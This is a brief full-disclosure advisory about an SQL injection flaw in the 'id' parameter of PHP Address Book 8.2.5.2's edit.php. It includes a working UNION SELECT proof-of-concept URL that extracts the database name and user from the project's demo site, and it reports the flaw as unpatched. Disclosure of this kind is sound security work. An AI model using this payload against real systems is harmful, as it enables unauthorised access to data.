PHP Address Book 8.2.5.2 SQL Injection
Posted on 18 November 2015
## Full Disclosure #Exploit Title : PHP Address Book SQL Injection Vulnerability #Exploit Author : Rahul Pratap Singh #Date : 14/Nov/2015 #Home Page Link : http://sourceforge.net/projects/php-addressbook/ #Blog Url : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Status : Not Patched 1. Description "id" field in edit.php is not properly sanitized, that leads to SQL Injection Vulnerability. 2. Proof of Concept http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union select 1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+ ## Vendor Response No reply from vendor